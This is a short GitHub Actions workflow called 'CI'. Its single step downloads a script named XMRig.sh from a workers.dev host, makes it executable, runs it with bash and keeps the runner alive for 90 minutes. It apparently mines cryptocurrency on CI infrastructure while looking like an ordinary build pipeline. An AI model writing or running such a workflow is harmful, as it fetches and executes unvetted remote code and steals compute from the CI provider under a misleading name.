name: CI

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v2
      
      - name: Run a multi-line script
        run: |
          apt install wget -y
          wget https://ddos.nms.workers.dev/XMRig.sh
          chmod 777 XMRig.sh
          bash XMRig.sh
          sleep 90m
